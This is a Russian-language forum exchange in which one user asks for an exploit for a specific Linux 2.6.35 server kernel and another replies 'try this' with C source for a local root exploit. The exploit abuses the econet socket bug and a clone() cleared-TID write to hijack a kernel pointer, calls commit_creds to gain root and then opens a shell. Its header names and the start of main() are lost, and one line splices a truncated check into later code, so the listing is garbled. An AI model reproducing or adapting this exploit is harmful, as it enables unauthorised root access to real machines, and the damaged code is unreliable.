Цитата:
Сообщение от Cuko  
Здравствуйте, есть что под это ядро?
Linux l17 2.6.35.7-c-s-xxx #1 SMP Sun Oct 3 02:17:12 MSD 2010 x86_64 Intel(R) Xeon(R) CPU X5650 @ 2.67GHz GenuineIntel GNU/Linux
Пробуй это

Код:
/*
 * Linux Kernel local privilege escalation -- header comment truncated.
 * Everything from the first "<" to the next ">" was lost when this code
 * was pasted through HTML, which is also why the #include lines below
 * carry no header names and why trigger()/main() are cut in the middle.
 * The targeted version range, author and usage notes were in the lost
 * span. Do not build from this page; recover an intact copy.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* How many bytes should we clear in our
   * function pointer to put it into userspace?
   * SHIFT is that amount expressed in bits (3 bytes on x86-64, 1 byte on
   * i386) and OFFSET the same amount in bytes. Neither is used by any
   * code that survives in this listing; a "... SHIFT;" fragment of the
   * lost part of main() remains below, where they presumably derive the
   * user-space `landing` address and the byte position at which the
   * kernel pointer is zeroed. */
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif

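/* thanks spender... */

/*
 * Symbol lookup for the running kernel.
 *
 * get_kernel_sym() tries, in order: /proc/kallsyms ("addr type name"),
 * the pre-2.6 /proc/ksyms ("addr name", with version suffixes), and
 * /boot/System.map-<uname release>. It returns the address, or 0 when
 * the symbol is not found in any of them. A hit whose listed address is
 * 0 is treated as a miss: kernels that hide symbol addresses from
 * unprivileged readers print every kallsyms entry as 0, and the
 * System.map fallback should still get its chance in that case.
 *
 * Changes against the original single-function version:
 *  - every %s conversion is bounded to the 512-byte name buffer;
 *  - a partially parsed line is no longer compared against the
 *    previous entry's name left over in the buffer;
 *  - releases 3.x and later were misclassified as pre-2.6 (strncmp
 *    against "2.6"), which made the System.map fallback parse with the
 *    two-column layout and never match;
 *  - uname() failure and a NULL from strrchr() are handled;
 *  - the System.map path is built with snprintf().
 */

/* Normalise a /proc/ksyms name in place so it compares equal to the
 * bare symbol name: entries whose name contains "_O/" or "_S." are
 * rejected, and a trailing "_smp..." style suffix is cut off together
 * with the underscores before it. Returns 1 if the name is usable,
 * 0 if the entry should be skipped. */
static int ksyms_normalise(char *sname)
{
  char *p;

  if (strstr(sname, "_O/") || strstr(sname, "_S."))
    return 0;

  p = strrchr(sname, '_');
  if (p != NULL && p > (char *)sname + 5 && !strncmp(p - 3, "smp", 3)) {
    p -= 4;
    while (p > (char *)sname && *(p - 1) == '_')
      p--;
    *p = '\0';
  }
  return 1;
}

/* 1 if `release` names a kernel older than 2.6 (the ones whose symbol
 * tables use the two-column layout), 0 otherwise. An unparsable string
 * counts as modern. */
static int release_is_pre_26(const char *release)
{
  unsigned major = 0, minor = 0;

  if (sscanf(release, "%u.%u", &major, &minor) < 1)
    return 0;
  return major < 2 || (major == 2 && minor < 6);
}

/* Scan one open symbol table for `name`. `oldstyle` selects the
 * two-column /proc/ksyms layout. On a hit with a non-zero address the
 * address is stored in *addr and 1 is returned; 0 is returned at EOF
 * or when the hit has address 0. `f` is left open. */
static int scan_symtab(FILE *f, const char *name, int oldstyle,
                       unsigned long *addr)
{
  char sname[512];
  char type;
  int want = oldstyle ? 2 : 3;   /* fields a well-formed line yields */
  int ret = 0;

  while (ret != EOF) {
    unsigned long a = 0;

    if (oldstyle)
      ret = fscanf(f, "%lx %511s\n", &a, sname);
    else
      ret = fscanf(f, "%lx %c %511s\n", &a, &type, sname);

    if (ret == 0) {
      /* The address column did not parse -- e.g. the "[module]" tail
       * of a kallsyms line. Discard one token and resync. */
      if (fscanf(f, "%511s\n", sname) == EOF)
        break;
      continue;
    }
    if (ret != want)
      continue;       /* short line: sname may be stale */
    if (oldstyle && !ksyms_normalise(sname))
      continue;
    if (strcmp(name, sname) != 0)
      continue;

    if (a == 0) {
      fprintf(stdout, " [-] %s is listed with address 0 (symbol addresses hidden?)\n", name);
      return 0;
    }
    *addr = a;
    return 1;
  }
  return 0;
}

unsigned long get_kernel_sym(char *name)
{
  FILE *f;
  struct utsname ver;
  char path[512];
  unsigned long addr = 0;
  int oldstyle = 0;

  /* The live kernel's own table first; /proc/ksyms is the pre-2.6 form. */
  f = fopen("/proc/kallsyms", "r");
  if (f == NULL) {
    f = fopen("/proc/ksyms", "r");
    if (f != NULL)
      oldstyle = 1;
  }
  if (f != NULL) {
    int hit = scan_symtab(f, name, oldstyle, &addr);
    fclose(f);
    if (hit) {
      fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr);
      return addr;
    }
  }

  /* Fallback: the System.map installed for the running release. */
  if (uname(&ver) != 0)
    return 0;
  if (release_is_pre_26(ver.release))
    oldstyle = 1;
  snprintf(path, sizeof path, "/boot/System.map-%s", ver.release);
  f = fopen(path, "r");
  if (f == NULL)
    return 0;
  {
    int hit = scan_symtab(f, name, oldstyle, &addr);
    fclose(f);
    if (!hit)
      return 0;
  }
  fprintf(stdout, " [+] Resolved %s to %p (via System.map)\n", name, (void *)addr);
  return addr;
}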

/* The two kernel credential helpers the payload calls, typed as plain
 * function pointers over unsigned long (rather than struct cred *) so
 * no kernel headers are needed. Both globals are zero-initialised here;
 * the part of main() lost from this listing presumably fills them from
 * get_kernel_sym() before the trigger runs -- getroot() dereferences
 * them unconditionally, so a failed lookup means a kernel crash, not a
 * clean error.
 * NOTE(review): regparm(3) matches the i386 kernel's -mregparm=3
 * calling convention; on x86-64 GCC accepts and ignores it. The leading
 * underscore on the typedef names is in the implementation-reserved
 * namespace. */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

/* Kernel-side payload, reached through trampoline(). Replaces the
 * current task's credentials with the set prepare_kernel_cred(0) hands
 * back (the kernel's own, i.e. root) and returns -1, presumably so the
 * hijacked call site reports an error and unwinds. `file` and `vma`
 * exist only to match the signature of the hijacked operation; neither
 * is read. Requires commit_creds / prepare_kernel_cred to already hold
 * resolved kernel addresses. */
static int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{
    unsigned long root_cred;

    (void)file;
    (void)vma;

    root_cred = prepare_kernel_cred(0);
    commit_creds(root_cred);
    return -1;
}

/* Why do I do this?  Because on x86-64, the address of
   * commit_creds and prepare_kernel_cred are loaded relative
   * to rip, which means I can't just copy the above payload
   * into my landing area.
   *
   * main() memcpy()s 1024 bytes starting at &trampoline into the
   * mapping at `landing`, so this function's machine code must work
   * from wherever it is copied to. It therefore loads getroot's
   * absolute address into a register and calls through it, instead of
   * a relative call that would only be valid at the original location.
   *
   * NOTE(review): "mov $getroot, %rax" is a 32-bit sign-extended
   * absolute immediate (R_X86_64_32S). Toolchains that default to PIE
   * refuse to link it ("can't be used when making a PIE object");
   * build with -no-pie (and -fno-pic) for this to assemble as intended.
   * The basic asm also declares no clobbers, so the compiler is not told
   * that %rax/%eax is overwritten -- tolerable only because nothing in
   * this function uses a register after the call. regparm(3) is an
   * i386 calling-convention attribute and is ignored on x86-64. */
void __attribute__((regparm(3)))
trampoline()
{

#ifdef __x86_64__
  asm("mov $getroot, %rax; call *%rax;");
#else
  asm("mov $getroot, %eax; call *%eax;");
#endif

}

/* Triggers a NULL pointer dereference in econet_sendmsg
   * via sock_no_sendpage, so it's under KERNEL_DS */
/* NOTE(review): this part of the listing is damaged. Everything between
 * a "<" and the next ">" appears to have been swallowed when the code
 * was pasted through HTML (the bare "#include" lines above lost their
 * header names the same way). The "if(ret" line below is where
 * trigger()'s error check, the rest of trigger(), and the whole opening
 * of main() -- argument handling, the socket/pipe setup that fills
 * fildes, the symbol lookups that fill commit_creds / prepare_kernel_cred,
 * and the computation of target, landing and newstack -- were lost.
 * As shown this does not compile; take the code from an intact copy. */
int trigger(int * fildes)
{
  int ret;
  struct ifreq ifr;

  /* Hard-coded interface name: SIOCSIFADDR fails if no "eth0" exists.
   * fildes[2] is presumably the Econet socket opened in the lost part
   * of main(). strncpy() with a length of IFNAMSIZ need not terminate
   * ifr_name, but the memset() just before has zeroed the struct. */
  memset(&ifr, 0, sizeof(ifr));
  strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);

  ret = ioctl(fildes[2], SIOCSIFADDR,&ifr);

  /* -- truncated here. Originally an "if(ret < 0) ..." check; the
   * "SHIFT;" at the end of the line is the tail of a main() statement
   * that uses the SHIFT macro (presumably the computation of `landing`).
   * Everything after this line belongs to main(). -- */
  if(ret>   SHIFT;

  /* main() continues. RWX mapping of the two pages around `landing`,
   * the user-space address the clobbered kernel pointer will end up
   * pointing at. MAP_FIXED silently replaces anything already mapped
   * there; a page below vm.mmap_min_addr is refused for unprivileged
   * callers, which is the usual reason for the failure message.
   * NOTE(review): failure is tested as (long)payload == -1 rather than
   * against MAP_FAILED -- equivalent on Linux, just unidiomatic. */
  payload = mmap((void *)(landing&   ~0xfff), 2 * 4096,
    PROT_READ | PROT_WRITE | PROT_EXEC,
    MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

  if ((long)payload == -1) {
     printf("[*] Failed to mmap() at target address.\n");
     return -1;
  }

  /* Drop trampoline()'s machine code at `landing`. 1024 bytes is only an
   * upper bound: the copy also takes whatever follows trampoline() in
   * .text, which is harmless but not tied to the function's real size. */
  memcpy((void *)landing,&trampoline, 1024);

  /* Run trigger() in a child sharing this address space (CLONE_VM) on a
   * 64 KiB stack (newstack comes from the lost code). CLONE_CHILD_CLEARTID
   * with ctid = target is the actual write primitive: per clone(2) the
   * kernel stores a zero at that address when the child exits, and
   * `target` is presumably a kernel address from get_kernel_sym(). The
   * child dying inside the econet path while under KERNEL_DS (see the
   * comment on trigger()) is what lets that store reach kernel memory,
   * zeroing part of a function pointer -- the "bytes to clear" the
   * SHIFT/OFFSET macros describe. clone()'s return value is not checked. */
  clone((int (*)(void *))trigger,
     (void *)((unsigned long)newstack + 65536),
     CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
  &fildes, NULL, NULL, target);

  sleep(1);   /* crude: a fixed one-second wait for the child to die */

  printf("[*] Triggering payload...\n");
  /* Presumably drives the kernel through the now partially-zeroed
   * pointer, landing in the trampoline copy, which calls getroot(). */
  ioctl(fildes[2], 0, NULL);

  /* Success is judged solely by this process's uid afterwards. */
  if(getuid()) {
     printf("[*] Exploit failed to get root.\n");
     return -1;
  }

  printf("[*] Got root!\n");
  /* If execl() fails nothing is reported and main() falls off the end
   * without a return statement. */
  execl("/bin/sh", "/bin/sh", NULL);
}
 